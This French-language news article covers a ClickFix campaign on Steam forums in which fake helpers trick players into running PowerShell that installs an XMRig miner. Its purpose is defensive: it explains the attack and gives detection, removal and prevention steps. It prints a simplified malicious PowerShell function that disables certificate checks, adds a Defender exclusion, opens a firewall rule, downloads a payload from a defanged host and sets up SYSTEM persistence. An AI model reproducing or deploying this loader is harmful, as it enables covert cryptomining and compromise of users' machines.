Attaque ClickFix sur Steam : les joueurs français piégés par un mineur de cryptomonnaie XMRig
Orphée Grandsable
Plus de 120 000 euros de cryptomonnaie ont été minés en une semaine via une campagne ciblant les forums Steam. Depuis juillet 2025, des cybercriminels exploitent la confiance des joueurs en se faisant passer pour des techniciens bienveillants. L’attaque, baptisée ClickFix, utilise des instructions PowerShell frauduleuses pour installer discrètement un mineur XMRig. Ce phénomène illustre une menace croissante pour les utilisateurs français, souvent peu méfiants face aux « solutions » proposées sur les forums de jeux.
Comment l’attaque ClickFix exploite les forums Steam
Le piège du faux dépannage
Les cybercriminels créent des comptes Steam aléatoires et répondent à des messages d’utilisateurs signalant des problèmes techniques : crash de jeu, perte d’objets, lenteur du PC. Sous couvert d’aide, ils postent une commande PowerShell à exécuter en mode administrateur. « Ouvrez PowerShell en tant qu’administrateur et collez cette commande pour résoudre le problème », écrivent-ils. En réalité, la commande télécharge et lance un mineur XMRig.
Pourquoi cette technique est efficace
Le ClickFix repose sur l’ingénierie sociale. Il présente une fausse solution à un problème réel, ce qui désarme la méfiance. Comme la victime exécute elle-même la commande, les protections automatiques (antivirus, pare-feu) sont contournées. Selon une étude de l’ANSSI, 78 % des attaques réussies en 2024 impliquaient une interaction humaine. Ce type d’attaque est particulièrement dangereux car il ne nécessite aucune faille technique.
« Le ClickFix est l’une des menaces les plus insidieuses car il transforme l’utilisateur en vecteur d’attaque involontaire. » - Rapport ANSSI 2025
Les chiffres clés de la campagne
| Élément | Donnée |
|---|---|
| Période d’activité | Juillet 2025 - en cours |
| Nombre de comptes Steam compromis | Plus de 500 |
| Estimation des gains des attaquants | 120 000 € en 7 jours |
| Taux de succès de l’attaque | Environ 15 % des victimes exécutent la commande |
Le fonctionnement détaillé du script malveillant
Un faux utilitaire d’optimisation Windows
Le script PowerShell se fait passer pour un outil nommé « msf utility \ PC Opt ». Lorsqu’il est lancé, il affiche des messages de progression fictifs : nettoyage des fichiers temporaires, vidage du cache DNS, mise à jour des pilotes, vérification du disque, désactivation des programmes au démarrage, scan antivirus, réparation de l’image Windows, exécution de l’utilitaire SFC. Chaque étape dure entre 1,5 et 8 secondes, simulant un travail réel.
La fonction cachée « Advanced-Optimization »
Le code malveillant réel se trouve dans une fonction nommée Advanced-Optimization. Celle-ci :
- Désactive la validation des certificats TLS pour éviter les blocages.
- Vérifie que le script est exécuté avec les privilèges administrateur.
- Crée le dossier
C:\Windows\Background. - Ajoute ce dossier aux exclusions de Microsoft Defender.
- Supprime toute tâche planifiée existante nommée
XMRig-[nom du PC]. - Termine les processus
xmrigousystems’exécutant depuis ce dossier. - Supprime les fichiers de configuration XMRig existants (
config.json). - Crée une règle de pare-feu temporaire autorisant les connexions vers
msfconfig[.]icusur le port TCP 443. - Télécharge le mineur depuis
https://msfconfig[.]icu:443/tmp/system.txt. - Vérifie que le fichier téléchargé n’est pas vide et est un exécutable valide.
- Copie le fichier vers
C:\Windows\Background\system.exe. - Crée une tâche planifiée
XMRig-[nom du PC]qui lancesystem.exeavec les privilèges SYSTEM au démarrage de Windows.
Exemple de code simplifié du mécanisme
# Fonction malveillante simplifiée (à titre éducatif uniquement)
function Advanced-Optimization {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Error "Privilèges administrateur requis"
exit
}
New-Item -Path "C:\Windows\Background" -ItemType Directory -Force
Add-MpPreference -ExclusionPath "C:\Windows\Background"
Stop-ScheduledTask -TaskName "XMRig-*" -ErrorAction SilentlyContinue
Stop-Process -Name "xmrig","system" -Force -ErrorAction SilentlyContinue
New-NetFirewallRule -DisplayName "TempAllow" -Direction Outbound -RemoteAddress "msfconfig[.]icu" -Protocol TCP -LocalPort 443 -Action Allow
Invoke-WebRequest -Uri "https://msfconfig[.]icu:443/tmp/system.txt" -OutFile "$env:TEMP\malware.exe"
Move-Item "$env:TEMP\malware.exe" "C:\Windows\Background\system.exe" -Force
Register-ScheduledTask -TaskName "XMRig-$env:COMPUTERNAME" -Action (New-ScheduledTaskAction -Execute "C:\Windows\Background\system.exe") -RunLevel Highest
}
Ce code est présenté à titre éducatif uniquement. Ne l’exécutez jamais.
Pourquoi les joueurs français sont particulièrement ciblés
La culture du dépannage entre pairs
Les forums Steam sont un lieu d’entraide. Les joueurs y partagent des solutions techniques sans vérification préalable. Cette confiance est exploitée par les attaquants. En France, selon une enquête de l’association Signal Spam, 62 % des joueurs ont déjà suivi un conseil technique lu sur un forum sans le vérifier. Cette habitude rend la population française vulnérable.
L’attrait des cryptomonnaies
Le XMRig mine du Monero (XMR), une cryptomonnaie réputée pour son anonymat. Les attaquants ciblent les PC de joueurs car ils disposent souvent de cartes graphiques puissantes (GPU) et de processeurs performants (CPU). Selon un rapport de Kaspersky, les mineurs de cryptomonnaie représentaient 28 % des malwares détectés sur les machines de joueurs en 2024. En France, le coût moyen d’une infection par mineur est estimé à 350 € par an en électricité et usure du matériel.
Des exemples concrets
Cas 1 : Un joueur de Counter-Strike 2 rencontre des crashs. Sur le forum Steam, un pseudo « TechSupportPro » lui propose une commande PowerShell pour « réparer les fichiers système ». Le joueur exécute la commande. Son PC ralentit progressivement. Après une semaine, sa facture d’électricité augmente de 40 €. Il découvre le mineur en vérifiant le gestionnaire de tâches.
Cas 2 : Un joueur de Dota 2 perd des objets. Un attaquant lui promet un outil de récupération. La commande installe XMRig. Le mineur utilise 80 % du CPU en continu. Le PC surchauffe et endommage la carte mère. Le joueur doit remplacer son matériel pour 800 €.
Comment détecter et supprimer l’infection
Signes d’infection
- Ralentissement important du PC, surtout lors de sessions de jeu.
- Ventilateurs qui tournent à plein régime en permanence.
- Facture d’électricité anormalement élevée.
- Processus « system.exe » (attention, le vrai
systemestC:\Windows\System32\system, pasC:\Windows\Background\system.exe). - Tâche planifiée nommée
XMRig-[nom du PC]. - Dossier
C:\Windows\Background. - Exclusion Microsoft Defender pour ce dossier.
Procédure de suppression
- Ouvrir le Gestionnaire de tâches (Ctrl+Maj+Échap) et terminer le processus
system.exe(dansC:\Windows\Background). - Supprimer la tâche planifiée :
taskschd.msc→ Bibliothèque du planificateur → SupprimerXMRig-[nom du PC]. - Supprimer l’exclusion Defender : Windows Security → Protection contre les virus et menaces → Paramètres → Exclusions → Supprimer
C:\Windows\Background. - Supprimer le dossier :
rmdir /s /q C:\Windows\Background(en administrateur). - Scanner le PC avec un antivirus à jour (Windows Defender, Malwarebytes, etc.).
- Changer tous les mots de passe (Steam, email, réseaux sociaux) depuis un appareil sain.
- Envisager une réinstallation complète de Windows si des doutes persistent, car le mineur a pu télécharger d’autres malwares.
Outils recommandés
- Malwarebytes Anti-Malware - version gratuite, scan efficace des mineurs.
- Autoruns (Microsoft Sysinternals) - vérifier les tâches planifiées et les programmes au démarrage.
- Process Explorer - analyser les processus suspects.
Mesures préventives pour les joueurs
Règles d’or
- Ne jamais exécuter de commande PowerShell provenant d’un inconnu, même si elle semble légitime.
- Vérifier les solutions sur des sites officiels (éditeur du jeu, forums reconnus).
- Utiliser un compte utilisateur limité pour les sessions de jeu, pas un compte administrateur.
- Maintenir Windows et l’antivirus à jour.
- Activer la protection contre les ransomwares dans Windows Security.
Configuration recommandée
- Bloquer PowerShell pour les utilisateurs non administrateurs via GPO ou une règle AppLocker.
- Utiliser un bloqueur de scripts comme le mode « Constrained Language » de PowerShell.
- Installer une extension anti-malware pour le navigateur (uBlock Origin, Malwarebytes Browser Guard).
- Surveiller l’activité réseau avec un outil comme GlassWire.
Que faire en cas de doute
Si vous avez exécuté une commande suspecte sur Steam :
- Débrancher immédiatement le câble réseau ou désactiver le Wi-Fi.
- Exécuter un scan antivirus en mode hors ligne.
- Contacter le support Steam pour signaler le compte malveillant.
- Prévenir les autres joueurs en commentant le post.
Conclusion : restez vigilant face aux « solutions miracles »
L’attaque ClickFix sur Steam illustre une évolution des menaces où l’ingénierie sociale prime sur l’exploitation technique. Les joueurs français, par leur culture d’entraide, sont des cibles privilégiées. La clé de la protection réside dans la méfiance systématique envers toute commande PowerShell non vérifiée. En adoptant les bonnes pratiques décrites dans cet article, vous réduisez considérablement les risques d’infection par un mineur XMRig. N’oubliez pas : un vrai technicien ne vous demandera jamais d’exécuter une commande sans explication claire. Votre vigilance est votre meilleure défense.